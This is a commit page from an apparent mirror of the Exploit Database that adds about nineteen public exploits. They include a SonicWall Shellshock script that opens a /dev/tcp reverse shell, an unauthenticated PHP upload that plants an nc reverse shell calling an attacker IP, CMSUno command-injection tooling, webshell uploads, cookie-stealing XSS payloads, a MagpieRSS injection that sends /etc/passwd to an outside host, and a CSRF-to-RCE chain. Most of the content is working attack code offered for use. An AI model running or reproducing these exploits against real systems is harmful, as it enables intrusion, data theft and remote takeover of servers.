bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-11-02

Browse source 
19 changes to exploits/shellcodes

jQuery UI 1.12.1 - Denial of Service (DoS)

Nsasoft Hardware Software Inventory 1.6.4.0 - 'multiple' Denial of Service (PoC)

Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (3)

Microsoft Exchange 2019 - Server-Side Request Forgery

KZTech T3500V 4G LTE CPE 2.0.1 - Weak Default WiFi Password Algorithm

MyBB Timeline Plugin 1.0 - Persistent Cross-Site Scripting

CMSUno 1.6.2 - 'lang' Remote Code Execution (Authenticated)

WordPress Plugin SuperForms 4.9 - Arbitrary File Upload

Home Assistant Community Store (HACS) 1.10.0 - Directory Traversal

SonicWall SSL-VPN 8.0.0.0 - 'visualdoor' Remote Code Execution (Unauthenticated)

Web Based Quiz System 1.0 - 'MCQ options' Persistent Cross-Site Scripting

Online Ordering System 1.0 - Arbitrary File Upload

Hotel and Lodge Management System 1.0 - Remote Code Execution (Unauthenticated)
CouchCMS 2.2.1 - Persistent Cross-Site Scripting
Microsoft Exchange 2019 - Server-Side Request Forgery (Proxylogon) (PoC)

MagpieRSS 0.72 - 'url' Command Injection

CouchCMS 2.2.1 - Server-Side Request Forgery

GetSimple CMS My SMTP Contact Plugin 1.1.2 - Persistent Cross-Site Scripting

Montiorr 1.7.6m - Persistent Cross-Site Scripting
This commit is contained in:
Offensive Security 2021-11-02 05:02:13 +00:00
parent de260aeac6
commit 27af25c8c3
20 changed files with 1801 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

82
exploits/hardware/remote/49695.txt Normal file
View file

@ -0,0 +1,82 @@
# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Weak Default WiFi Password Algorithm
# Date: 03.02.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
http://www.jatontec.com/products/show.php?itemid=258
http://www.jatontech.com/CAT12.html#_pp=105_564
http://www.kzbtech.com/AM3300V.html
https://neotel.mk/ostanati-paketi-2/
Affected version: Model | Firmware
-------|---------
JT3500V | 2.0.1B1064
JT3300V | 2.0.1B1047
AM6200M | 2.0.0B3210
AM6000N | 2.0.0B3042
AM5000W | 2.0.0B3037
AM4200M | 2.0.0B2996
AM4100V | 2.0.0B2988
AM3500MW | 2.0.0B1092
AM3410V | 2.0.0B1085
AM3300V | 2.0.0B1060
AM3100E | 2.0.0B981
AM3100V | 2.0.0B946
AM3000M | 2.0.0B21
KZ7621U | 2.0.0B14
KZ3220M | 2.0.0B04
KZ3120R | 2.0.0B01
Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
& VoIP CPE product specially designed to enable quick and easy
LTE fixed data service deployment for residential and SOHO customers.
It provides high speed LAN, Wi-Fi and VoIP integrated services
to end users who need both bandwidth and multi-media data service
in residential homes or enterprises. The device has 2 Gigabit LAN
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
and firewall software for security. It provides an effective
all-in-one solution to SOHO or residential customers. It can
deliver up to 1Gbps max data throughput which can be very
competitive to wired broadband access service.
Desc: The device generates its SSID and password based on the
WAN MAC address.
Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
Linux 2.6.36+ (mips)
Mediatek APSoC SDK v4.3.1.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5638
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5638.php
03.02.2021
--
Example defaults:
# ifconfig |grep HWaddr
br0 Link encap:Ethernet HWaddr 6C:AD:EF:16:7C:5D
br0:9 Link encap:Ethernet HWaddr 6C:AD:EF:16:7C:5D
eth2 Link encap:Ethernet HWaddr 6C:AD:EF:16:7C:5D
eth2.1 Link encap:Ethernet HWaddr 6C:AD:EF:16:7C:5D
eth2.100 Link encap:Ethernet HWaddr 6C:AD:EF:16:7C:5D
eth2.1000 Link encap:Ethernet HWaddr 6C:AD:EF:16:7C:5D
eth2.2 Link encap:Ethernet HWaddr 6C:AD:EF:FF:00:01
ra0 Link encap:Ethernet HWaddr 6C:AD:EF:5D:7C:5C
rai0 Link encap:Ethernet HWaddr 6C:AD:EF:5E:7C:5C
SSID1=MyWiFi-167C5D
SSID1=MyWiFi-5G-167C5D
WiFi password = EF167C5D

105
exploits/hardware/webapps/49499.py Executable file
View file

@ -0,0 +1,105 @@
# Exploit Title: SonicWall SSL-VPN 8.0.0.0 - 'shellshock/visualdoor' Remote Code Execution (Unauthenticated)
# Exploit Author: Darren Martyn
# Vendor Homepage: https://www.home-assistant.io/
# Version: < SMA 8.0.0.4
# Blog post: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
#!/usr/bin/python
# coding: utf-8
# Author: Darren Martyn
# Credit: Phineas Fisher
# Notes:
# This exploit basically implements the exploits Phineas Fisher used to pwn Hacking Team
# and the Cayman Trust Bank place. It uses the Shellshock vulnerability to gain a command
# execution primitive as the "nobody" user in the cgi-bin/jarrewrite.sh web-script, spawns
# a trivial reverse shell using /dev/tcp.
# There is a fairly trivial LPE in these that gets you root by abusing setuid dos2unix, but
# implementing that is left as an exercise for the reader. I've seen a few approaches, and
# would be interested in seeing yours.
# There is another LPE that works only on some models which I also have removed from this.
# Details: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
import requests
import sys
import telnetlib
import socket
from threading import Thread
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
import time
def banner():
print """
88 88
"" 88
88
8b d8 88 ,adPPYba, 88 88 ,adPPYYba, 88
`8b d8' 88 I8[ "" 88 88 "" `Y8 88
`8b d8' 88 `"Y8ba, 88 88 ,adPPPPP88 88
`8b,d8' 88 aa ]8I "8a, ,a88 88, ,88 88
"8" 88 `"YbbdP"' `"YbbdP'Y8 `"8bbdP"Y8 88
88
88
88
,adPPYb,88 ,adPPYba, ,adPPYba, 8b,dPPYba,
a8" `Y88 a8" "8a a8" "8a 88P' "Y8
8b 88 8b d8 8b d8 88
"8a, ,d88 "8a, ,a8" "8a, ,a8" 88
`"8bbdP"Y8 `"YbbdP"' `"YbbdP"' 88
SonicWall SSL-VPN Appliance Remote Exploit
Public Release (Jan 2021). Author: Darren Martyn. Credit
goes to Phineas Fisher for this. Stay inside, do crimes.
"""
def handler(lp): # handler borrowed from Stephen Seeley.
print "(+) starting handler on port %d" %(lp)
t = telnetlib.Telnet()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", lp))
s.listen(1)
conn, addr = s.accept()
print "(+) connection from %s" %(addr[0])
t.sock = conn
print "(+) pop thy shell!"
t.interact()
def execute_command(target, command):
url = target + "/cgi-bin/jarrewrite.sh"
headers = {"User-Agent": "() { :; }; echo ; /bin/bash -c '%s'" %(command)}
r = requests.get(url=url, headers=headers, verify=False)
return r.text
def check_exploitable(target):
print "(+) Testing %s for pwnability..." %(target)
output = execute_command(target=target, command="cat /etc/passwd")
if "root:" in output:
print "(*) We can continue, time to wreck this shit."
return True
else:
return False
def pop_reverse_shell(target, cb_host, cb_port):
print "(+) Sending callback to %s:%s" %(cb_host, cb_port)
backconnect = "nohup bash -i >& /dev/tcp/%s/%s 0>&1 &" %(cb_host, cb_port)
execute_command(target=target, command=backconnect)
def hack_the_planet(target, cb_host, cb_port):
if check_exploitable(target) == True:
pass
else:
sys.exit("(-) Target not exploitable...")
handlerthr = Thread(target=handler, args=(int(cb_port),))
handlerthr.start()
pop_reverse_shell(target=target, cb_host=cb_host, cb_port=cb_port)
def main(args):
banner()
if len(args) != 4:
sys.exit("use: %s https://some-vpn.lol:8090 hacke.rs 1337" %(args[0]))
hack_the_planet(target=args[1], cb_host=args[2], cb_port=args[3])
if __name__ == "__main__":
main(args=sys.argv)

36
exploits/multiple/dos/49489.html Normal file
View file

@ -0,0 +1,36 @@
# Exploit Title: jQuery UI 1.12.1 - Denial of Service (DoS)
# Date: 20 Jan, 2021
# Exploit Author: Rafael Cintra Lopes
# Vendor Homepage: https://jqueryui.com/
# Software Link: https://jqueryui.com/download/
# Version: <= 1.12.1
# CVE : CVE-2020-28488
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>DoS - jQuery UI 1.12.1</title>
</head>
<body>
<h2>DoS - jQuery UI 1.12.1</h2>
<div>
<button onclick="exploit()">Exploit</button>
</div>
<p>PoC by Rafael Cintra Lopes</p>
<script src="https://code.jquery.com/jquery-3.5.1.min.js" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script>
<script src="https://code.jquery.com/ui/1.12.1/jquery-ui.min.js" integrity="sha256-VazP97ZCwtekAsvgPBSUwPFKdrwD3unUfSGVYrahUqU=" crossorigin="anonymous"></script>
<script>
function exploit(){
for (var i = 0; i < 10; i++) {
$("div").dialog({title:'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'});
}
}
</script>
</body>
</html>

29
exploits/php/webapps/49467.txt Normal file
View file

@ -0,0 +1,29 @@
# Exploit Title: MyBB Timeline Plugin 1.0 - Cross-Site Scripting / CSRF
# Date: 1/21/2021
# Author: 0xB9
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1428
# Version: 1.0
# Tested on: Windows 10
1. Description:
MyBB Timeline replaces the default MyBB user profile. This introduces cross-site scripting on user profiles & a CSRF that allows for the users timeline banner/image to be changed.
2. Proof of Concept:
~ XSS via Thread/Post ~
- Make a new thread or reply to an existing thread
- Input a payload in either the thread title or main post itself <script>alert('XSS')</script>
Payload will execute when visiting your profile.
~ XSS via Location/Bio ~
- Go to User CP -> Edit Profile
- Input a payload in the Location/Bio <script>alert('XSS')</script>
Payload will execute when visiting your profile.
~ CSRF ~
<form class="coverpicForm" action="http://localhost/mybb/timeline.php?action=profile&uid=1" style="display: block;">
<input type="text" name="coverpic" placeholder="Add Image URL" required="">
<input type="hidden" name="do_coverpic" value="change">
<input type="submit" value="Change">
</form>

125
exploits/php/webapps/49485.rb Executable file
View file

@ -0,0 +1,125 @@
# Exploit Title: CMSUno 1.6.2 - 'lang/user' Remote Code Execution (Authenticated)
# Google Dorks:
# inurl:uno/central.php
# inurl:uno/config.php
# inurl:uno.php intitle:"CMSUno - Login"
# Exploit Author: noraj (Alexandre ZANNI) for SEC-IT (https://secit.fr) https://www.exploit-db.com/?author=10066
# Vendor Homepage: https://www.boiteasite.fr/cmsuno.html
# Software Link: https://github.com/boiteasite/cmsuno/archive/1.6.2.tar.gz
# Version: 1.6.1, 1.6.2
# Tested on: docker image: php:7.4-apache (Debian buster)
# CVE : CVE-2020-25557 & CVE-2020-25538
# Vulnerabilities
## Discoverer: Fatih Çelik
## Discoverer website: https://fatihhcelik.blogspot.com
## Vulnerability 1:
## Title: CMSUno 1.6.2 - 'user' Remote Code Execution (Authenticated)
## CVE: CVE-2020-25557
## References: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution.html
## Vulnerability 2:
## Title: CMSUno 1.6.2 - 'lang' Remote Code Execution (Authenticated)
## CVE: CVE-2020-25538
## References: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution_30.html
#!/usr/bin/env ruby
require 'httpclient'
require 'docopt'
# username = 'cmsuno'
# password = '654321'
# root_url = 'http://localhost:5000/'
# command = 'pwd'
doc = <<~DOCOPT
CMSUno 1.6.1 <= 1.6.2 - Remote Code Execution (Authenticated)
Usage:
#{__FILE__} -r <url> -c <cmd> [-u <username>] [-p <password>] [-t <tech>] [--debug]
#{__FILE__} -H | --help
Options:
-r <url>, --root-url <url> Root URL (base path) including HTTP scheme, port and root folder
-u <username>, --user <username> user name (if not default: cmsuno)
-p <password>, --pass <password> User password (if not default: 654321)
-c <cmd>, --command <cmd> Command to execute on the target
-t <tehc>, --technique <tech> Technique: exploiting 'user' param (default, with output) or 'lang' param (blind)
--debug Display arguments
-h, --help Show this screen
Examples:
#{__FILE__} -r http://example.org -c id
#{__FILE__} -r https://example.org:5000/cmsuno -c 'touch hackproof' -u john -p admin1234 -t lang
DOCOPT
# Get anti-CSRF token
def get_unox(client, auth_status)
print '[*] Fetching anti-CSRF token: '
res = client.get(LOGIN_URL)
case auth_status
when false
regexp = /name="unox" value="([a-f0-9]{32}?)"/
when true
regexp = /Unox='([a-f0-9]{32}?)'/
end
token = regexp.match(res.body).captures[0].chomp
puts token
return token
end
def login(client, user, pass)
data = {
'unox' => get_unox(client, false),
'user' => user,
'pass' => pass,
}
puts '[*] Logging in'
res = client.post(LOGIN_URL, data)
return res.body
end
def exploit(client, user, pass, cmd, tech)
payload = "#{user}\";$pass='#{pass}';system('#{cmd}');?>// "
case tech
when 'user'
data = "action=sauvePass&unox=#{get_unox(client, true)}&user0=#{user}&pass0=#{pass}&user=#{payload}&pass=#{pass}&lang=en"
when 'lang'
data = "action=sauvePass&unox=#{get_unox(client, true)}&user0=&pass0=&user=&pass=&lang=#{payload}"
else
raise 'Wrong exploitation technique argument value'
end
headers = {
'X-Requested-With' => 'XMLHttpRequest'
}
#client.proxy = 'http://localhost:8080'
puts "[*] Starting exploitation, using '#{tech}' param technique"
client.post(VULNERABLE_URL, data, headers)
# Login again to trigger uno/password.php
clnt2 = HTTPClient.new
return login(clnt2, user, pass).lines[..-2].join
end
begin
args = Docopt.docopt(doc)
pp args if args['--debug']
username = args['--user'] || 'cmsuno'
password = args['--pass'] || '654321'
technique = args['--technique'] || 'user'
LOGIN_URL = "#{args['--root-url']}/uno.php"
VULNERABLE_URL = "#{args['--root-url']}/uno/central.php"
clnt = HTTPClient.new
login(clnt, username, password)
output = exploit(clnt, username, password, args['--command'], technique)
print '[*] Command output:'
case technique
when 'user'
puts "\n#{output}"
when 'lang'
puts ' blind RCE, no output with this exploitation technique'
end
rescue Docopt::Exit => e
puts e.message
end

50
exploits/php/webapps/49490.txt Normal file
View file

@ -0,0 +1,50 @@
# Exploit Title: WordPress Plugin SuperForms 4.9 - Arbitrary File Upload to Remote Code Execution
# Exploit Author: ABDO10
# Date : Jan - 28 - 2021
# Google Dork : inurl:"/wp-content/plugins/super-forms/"
# Vendor Homepage : https://renstillmann.github.io/super-forms/#/
# Version : All (<= 4.9.X)
# data in http request :
POST /wp-content/plugins/super-forms/uploads/php/ HTTP/1.1
<=== exploit end point
Host: localhost
User-Agent: UserAgent
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------423513681827540048931513055996
Content-Length: 7058
Origin: localhost
Connection: close
Referer: localhost
Cookie:
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="accept_file_types"
jpg|jpeg|png|gif|pdf|JPG|JPEG|PNG|GIF|PDF <=======
inject extension (|PHP4) to validate file to upload
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="max_file_size"
8000000
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="image_library"
0
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="files[]";
filename="filename.(extension)" <==== inject code extension (.php4)
for example
Content-Type: application/pdf
Evil codes to be uploaded
-----------------------------423513681827540048931513055996--
# Uploaded Malicious File can be Found in :
/wp-content/uploads/superforms/2021/01/<id>/filename.php4
u can get <id> from server reply .

42
exploits/php/webapps/49605.txt Normal file
View file

@ -0,0 +1,42 @@
# Exploit Title: Web Based Quiz System 1.0 - 'MCQ options' Persistent/Stored Cross-Site Scripting
# Date: 2021-03-02
# Exploit Author: Praharsh Kumar Singh
# Vendor Homepage: https://www.sourcecodester.com
# Software Download Link: https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html
# Software: Web Based Quiz System
# Version: 1.0
# Vulnerability Type: Cross-site Scripting
# Vulnerability: Persistent/Stored XSS
# Tested on: Parrot OS
# Stored/persistent XSS has been discovered in the Web Based Quiz System created by sourcecodester/janobe
# in adding questions in options parameter affected from this vulnerability.
# payload: </script><script >alert(document.cookie)</script>
POST /onlinequiz_0/update.php?q=addqns&n=1&eid=603d2f766b0d0&ch=4 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 101
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/onlinequiz_0/dashboard.php?q=4&step=2&eid=603d2f766b0d0&n=1
Cookie: PHPSESSID=icctgctoho6nlqc6cbp8bftkeh
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
qns1=1&11=1&12=1&13=%3C%2Fscript%3E%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&14=1&ans1=c
POC:
# go to url http://localhost:8080/admin.php
# login and add question
# then put the above payload in MCQ options parameter
# then fill the remaining details
# then click add
# go to url http://localhost:8080/login.php
# then login to user account
# then attempt the quiz while attempting the quiz xss pop up there..!

79
exploits/php/webapps/49615.txt Normal file
View file

@ -0,0 +1,79 @@
# Exploit Title: Online Ordering System 1.0 - Arbitrary File Upload to Remote Code Execution
# Date: 04/03/2021
# Exploit Author: Suraj Bhosale
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html
# Version: 1.0
# Tested on Windows 10, XAMPP
Request:
========
POST /onlineordering/GPST/store/initiateorder.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0)
Gecko/20100101 Firefox/85.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
boundary=---------------------------14955282031852449676680360880
Content-Length: 972
Origin: http://localhost
Connection: close
Referer: http://localhost/onlineordering/GPST/store/index.php
Cookie: PHPSESSID=0es23o87toitba1p1pdmq5i6ir
Upgrade-Insecure-Requests: 1
-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="transnum"
VAF-XAP
-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="select1"
25
-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="pname"
keychain
-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="select2"
1
-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="txtDisplay"
25
-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="note"
test
-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="image"; filename="shell.php"
Content-Type: application/octet-stream
<?php echo "Shell";system($_GET['cmd']); ?>
-----------------------------14955282031852449676680360880--
Response:
=========
HTTP/1.1 200 OK
Date: Thu, 04 Mar 2021 13:28:27 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.27
X-Powered-By: PHP/7.3.27
Content-Length: 55
Connection: close
Content-Type: text/html; charset=UTF-8
<meta http-equiv="refresh" content="1; url=index.php">
# Uploaded Malicious File can be Found in :
onlineordering\GPST\store\design
# go to
http://localhost/onlineordering/GPST/store/design/shell.php?cmd=hostname
which will execute hostname command.

57
exploits/php/webapps/49625.py Executable file
View file

@ -0,0 +1,57 @@
# Exploit Title: Hotel and Lodge Management System 1.0 - Remote Code Execution (Unauthenticated)
# Date: 07-03-2021
# Exploit Author: Christian Vierschilling
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html
# Version: 1.0
# Tested on: PHP 7.4.14, Linux x64_x86
# --- Description --- #
# The web application allows for an unauthenticated file upload which can result in a Remote Code Execution.
# Executing this script against a target might return a reverse php shell.
# --- Proof of concept --- #
#!/usr/bin/python3
import random
import sys
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder
def file_upload(target_ip, attacker_ip, attacker_port):
print("(+) Setting up reverse shell php file ..")
random_file_name = str(random.randint(100000, 999999)) + "revshell.php"
revshell_string = '<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f"); ?>'.format(attacker_ip, attacker_port)
m = MultipartEncoder(fields={'image': (random_file_name, revshell_string, 'application/x-php'),'btn_update':''})
print("(+) Trying to upload it ..")
r1 = requests.post('http://{}/hotel/source code/profile.php'.format(target_ip), data=m, headers={'Content-Type': m.content_type})
r2 = requests.get('http://{}/hotel/source code/uploadImage/Profile/'.format(target_ip))
if random_file_name in r2.text:
print("(+) File upload seems to have been successful!")
return random_file_name
else:
print("(-) Oh noes, file upload failed .. quitting!")
exit()
def trigger_shell(target_ip, random_file_name):
print("(+) Now trying to trigger our shell..")
r3 = requests.get('http://{}/hotel/source code/uploadImage/Profile/{}'.format(target_ip, random_file_name))
return None
def main():
if len(sys.argv) != 4:
print('(+) usage: %s <target ip> <attacker ip> <attacker port>' % sys.argv[0])
print('(+) eg: %s 10.0.0.1 10.13.37.10 4444' % sys.argv[0])
sys.exit(-1)
target_ip = sys.argv[1]
attacker_ip = sys.argv[2]
attacker_port = sys.argv[3]
revshell_file_name = file_upload(target_ip, attacker_ip, attacker_port)
trigger_shell(target_ip, revshell_file_name)
print("\n(+) done!")
if __name__ == "__main__":
main()

25
exploits/php/webapps/49636.txt Normal file
View file

@ -0,0 +1,25 @@
# Exploit Title: CouchCMS 2.2.1 - XSS via SVG file upload
# Date: 2021-01-25
# Exploit Author: xxcdd
# Vendor Homepage: https://github.com/CouchCMS/CouchCMS
# Software Link: https://github.com/CouchCMS/CouchCMS
# Version: v2.2.1
# Tested on: Windows 7
An issue was discovered in CouchCMS v2.2.1 (https://github.com/CouchCMS/CouchCMS/issues/130) that allows XSS via an /couch/includes/kcfinder/browse.php SVG upload.
upload url is :/couch/includes/kcfinder/browse.php?nonce=[yournonce]&type=file&CKEditor=f_main_content&CKEditorFuncNum=1&langCode=en
<http://127.0.0.1/couch/includes/kcfinder/browse.php?nonce=02b16f710f786c61f34e301eae552bdf&type=file&CKEditor=f_main_content&CKEditorFuncNum=1&langCode=en>
xss.svg content:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
<script type="text/javascript">
alert(document.cookie);
</script>
</svg>

22
exploits/php/webapps/49643.txt Normal file
View file

@ -0,0 +1,22 @@
# Exploit Title: MagpieRSS 0.72 - 'url' Command Injection and Server Side Request Forgery
# Date: 24 March 2021
# Exploit Author: bl4ckh4ck5
# Vendor Homepage: http://magpierss.sourceforge.net/
# Software Link: https://sourceforge.net/projects/magpierss/files/magpierss/magpierss-0.72/magpierss-0.72.tar.gz/download
# Version: MagpieRSS 0.72 and maybe older once aswell.
# Tested on: Linux debian buster with default apache install.
In MagpieRSS 0.72 on the /scripts/magpie_debug.php?url=testtest and /scripts/magpie_simple.php page i noticed there was a command injection in the RSS URL field when you send a https url and click the Parse RSS button.
if you would send "https://www.example.com? -o /var/www/html/testtest.php" as input it would save the url output to the testtest.php file directly in the /var/www/html/ folder.
the "?" is importent or it won't work.
it is also possible to read any file if you send it like this "https://zcf0arfay3qgko9i7xr0b2vnxe39ry.burpcollaborator.net? --data '@/etc/passwd'" then the page "zcf0arfay3qgko9i7xr0b2vnxe39ry.burpcollaborator.net" would receive as POST data the /etc/passwd file.
Outside of that because it uses the curl request directly from the prompt it is not restricted and it is possible to request internal pages like 127.0.0.1 however it is restricted to https requests only, but you can partionaly work arround that by sending the url like this "https://www.example.com? http://localhost/server-status/" then it also can send it to a http domain however then it is blind ssrf but on https domains you can make it vissable by first saving it to a file and if you can't write in the /var/www/html folder you sometimes can write it to the /tmp/testtest.txt and use "https://www.example.com? --data '@/tmp/testtest.txt'" to retrieve that file.
The problem occures in the file /extlib/Snoopy.class.inc on line 660:
https://github.com/kellan/magpierss/blob/04d2a88b97fdba5813d01dc0d56c772d97360bb5/extlib/Snoopy.class.inc#L660
On that page there they use a escapeshellcmd command to escape the https url however they didn't put it between quotes.
so it's possible to add a "-" to this and rewrite the curl command on the /scripts/magpie_debug.php and /scripts/magpie_simple.php page.
from there on you can esculate it to Server side request forgery or Code injection.
It mostlickly affects most versions but i have only tested it on version 0.72.

20
exploits/php/webapps/49675.svg Normal file
View file

@ -0,0 +1,20 @@
# Exploit Title: CouchCMS 2.2.1 - SSRF via SVG file upload
# Date: 2021-01-25
# Exploit Author: xxcdd
# Vendor Homepage: https://github.com/CouchCMS/CouchCMS
# Software Link: https://github.com/CouchCMS/CouchCMS
# Version: v2.2.1
# Tested on: Windows 7
An issue was discovered in CouchCMS v2.2.1 (https://github.com/CouchCMS/CouchCMS/issues/130) that allows SSRF via an /couch/includes/kcfinder/browse.php SVG upload.
upload url is :/couch/includes/kcfinder/browse.php?nonce=[yournonce]&type=file&CKEditor=f_main_content&CKEditorFuncNum=1&langCode=en
ssrf.svg content:
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="
http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
width="200" height="200">
<image height="200" width="200" xlink:href="http://<test_ip>:1234" />
</svg>

174
exploits/php/webapps/49798.py Executable file
View file

@ -0,0 +1,174 @@
# Exploit Title: GetSimple CMS My SMTP Contact Plugin 1.1.2 - CSRF to Stored XSS to RCE
# Exploit Author: Bobby Cooke (boku)
# Date: 22/04/2021
# Vendor Homepage: http://get-simple.info &
# Software Link: http://get-simple.info/download/
# Version: Exploit <= v1.1.1 | Stored XSS <= v1.1.2
# Tested against Server Host: Windows 10 Pro + XAMPP
# Tested against Client Browsers: Firefox (Linix & Windows), Internet Explorer
# Vendor: NetExplorer
# Exploit Description:
# The My SMTP Contact v1.1.2 plugin for GetSimple CMS suffers from a Stored Cross-Site Scripting (XSS) vulnerability, that when chained together with the CSRF vulnerability in v1.1.1, allows remote unauthenticated attackers to achieve Remote Code Execution on the hosting server, when an authenticated administrator visits a malicious third party website. The PHP function htmlspecialchars() attempts to sanitize the user-input, but is trivially bypassed by passing the dangerous characters as escaped hex bytes. This allows attackers to breakout of the HTML rendered by the PHP engine, to run arbitrary client-side code within the admins browser; after the admin submits the POST request from the CSRF attack. Since GetSimple CMS suffers from a known PHP code injection vulnerability within the themes edit page, the attacker can ride the admins session to perform a chain of XHR requests within the admins browser. The XHR chain triggered by the CSRF attack will collect the CSRF Token from the themes edit page, and use the token to exploit the PHP Code Injection vulnerability to upload a webshell within every page hosted by the CMS.
# Full Disclosure: github.com/boku7/gsSMTP-Csrf2Xss2RCE/
# CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
# CVSS Base Score: 9.6
import argparse,requests
from http.server import BaseHTTPRequestHandler, HTTPServer
from colorama import (Fore as F, Back as B, Style as S)
from threading import Thread
from time import sleep
FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT
def bullet(char,color):
C=FB if color == 'B' else FR if color == 'R' else FG
return SB+C+'['+ST+SB+char+SB+C+']'+ST+' '
info,err,ok = bullet('-','B'),bullet('-','R'),bullet('!','G')
class theTHREADER(object):
def __init__(self, interval=1):
self.interval = interval
thread = Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
run()
def webshell(target):
try:
websh = "{}/webshell.php".format(target,page)
term = "{}{}BOKU{} > {}".format(SB,FR,FB,ST)
welcome = ' {}{}]{}+++{}[{}========>{} HelloFriend {}<========{}]{}+++{}[{}'.format(SB,FY,FR,FY,FT,FR,FT,FY,FR,FY,ST)
print(welcome)
while True:
specialmove = input(term)
command = {'FierceGodKick': specialmove}
r = requests.post(websh, data=command, verify=False)
status = r.status_code
if status != 200:
r.raise_for_status()
response = r.text
print(response)
except:
pass
''' Breakout of the PHP and inject a <script> tag using escaped Hex codepoints to bypass the htmlspecialchars() PHP function
htmlspecailchars() only HTML encodes the chars: &"><'
"+><script>alert(1)</script> --> \x22\x2b\x3e\x3cscript\x3ealert(1)\x3c/script\x3e
PAYLOAD
- Replace alert(1) payload above with the XHR Chain to gain RCE
- XHR Chain first collects the CSRF token on the theme-edit.php page,
then uses the token to inject PHP code into all pages of the CMS via known vulnerable themes component of core application'''
def xhrRcePayload():
hexBreakoutOpen = '\\x22\\x2b\\x3e\\x3cscript\\x3e'
payload = 'var e=function(i){return encodeURIComponent(i);};'
payload += 'var h=\\x22application/x-www-form-urlencoded\\x22;'
payload += 'var u=\\x22/admin/theme-edit.php\\x22;'
payload += 'var xhr1=new XMLHttpRequest();'
payload += 'var xhr2=new XMLHttpRequest();'
